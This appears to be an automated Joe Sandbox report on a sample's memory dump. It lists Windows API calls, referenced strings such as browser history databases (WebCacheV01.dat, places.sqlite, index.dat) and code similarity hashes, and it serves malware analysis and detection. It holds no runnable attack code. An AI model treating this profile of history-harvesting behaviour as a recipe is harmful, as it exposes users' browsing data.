                                          • API String ID: 1343145685-3297466227
                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProcProcessTimes
                                          • String ID: GetProcessTimes$kernel32.dll
                                          • API String ID: 1714573020-3385500049
                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                          APIs
                                          • memset.MSVCRT ref: 004087D6
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                          • memset.MSVCRT ref: 00408828
                                          • memset.MSVCRT ref: 00408840
                                          • memset.MSVCRT ref: 00408858
                                          • memset.MSVCRT ref: 00408870
                                          • memset.MSVCRT ref: 00408888
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                          • String ID:
                                          • API String ID: 2911713577-0
                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: @ $SQLite format 3
                                          • API String ID: 1475443563-3708268960
                                          • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                          • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                          APIs
                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                          • memset.MSVCRT ref: 00414C87
                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                          Similarity
                                          • API ID: AddressCloseProcVersionmemsetwcscpy
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 2705122986-2036018995
                                          Similarity
                                          • API ID: _wcsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 1579243037-1578091866
                                          APIs
                                          • memset.MSVCRT ref: 0040E60F
                                          • memset.MSVCRT ref: 0040E629
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Strings
                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                          Similarity
                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                          • API String ID: 3354267031-2114579845
                                          APIs
                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          Strings
                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                          Similarity
                                          • API ID: memset
                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                          • API String ID: 2221118986-1725073988
                                          APIs
                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                          Similarity
                                          • API ID: ChangeCloseFindNotificationSleep
                                          • String ID: }A
                                          • API String ID: 1821831730-2138825249
                                          Similarity
                                          • API ID: ??3@DeleteObject
                                          • String ID: r!A
                                          • API String ID: 1103273653-628097481
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          APIs
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                          • memcmp.MSVCRT ref: 00444BA5
                                          Similarity
                                          • API ID: AddressProc$memcmp
                                          • String ID: $$8
                                          • API String ID: 2808797137-435121686
                                          APIs
                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                          Similarity
                                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                          • String ID:
                                          • API String ID: 1042154641-0
                                          APIs
                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                          • memset.MSVCRT ref: 00403A55
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                          Similarity
                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                          • String ID: history.dat$places.sqlite
                                          • API String ID: 3093078384-467022611
                                          APIs
                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                          • GetLastError.KERNEL32 ref: 00417627
                                          Similarity
                                          • API ID: ErrorLast$File$PointerRead
                                          • String ID:
                                          • API String ID: 839530781-0
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID: *.*$index.dat
                                          • API String ID: 1974802433-2863569691
                                          Similarity
                                          • API ID: ??3@mallocmemcpy
                                          • String ID:
                                          • API String ID: 3831604043-0
                                          APIs
                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                          • GetLastError.KERNEL32 ref: 004175A2
                                          • GetLastError.KERNEL32 ref: 004175A8
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                          Similarity
                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                          • String ID:
                                          • API String ID: 1631957507-0
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                          Similarity
                                          • API ID: Temp$DirectoryFileNamePathWindows
                                          • String ID:
                                          • API String ID: 1125800050-0
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memset
                                          • String ID: BINARY
                                          • API String ID: 2221118986-907554435
                                          APIs
                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                          Similarity
                                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                          • String ID:
                                          • API String ID: 1161345128-0
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID: /stext
                                          • API String ID: 2081463915-3817206916
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                          Similarity
                                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                          • String ID:
                                          • API String ID: 159017214-0
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          Similarity
                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 3150196962-0
                                          APIs
                                          Strings
                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                          Similarity
                                          • API ID: malloc
                                          • String ID: failed to allocate %u bytes of memory
                                          • API String ID: 2803490479-1168259600
                                          APIs
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          APIs
                                          Similarity
                                          • API ID: memcmpmemset
                                          • String ID:
                                          • API String ID: 1065087418-0
                                          APIs
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          APIs
                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                          Similarity
                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                          • String ID:
                                          • API String ID: 1481295809-0
                                          APIs
                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                          Similarity
                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 3150196962-0
                                          APIs
                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          Similarity
                                          • API ID: File$PointerRead
                                          • String ID:
                                          • API String ID: 3154509469-0
                                          APIs
                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                          • String ID:
                                          • API String ID: 4232544981-0
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          APIs
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                          Similarity
                                          • API ID: AddressProc$FileModuleName
                                          • String ID:
                                          • API String ID: 3859505661-0
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          APIs
                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          APIs
                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          APIs
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          APIs
                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                          APIs
                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                          APIs
                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                          APIs
                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
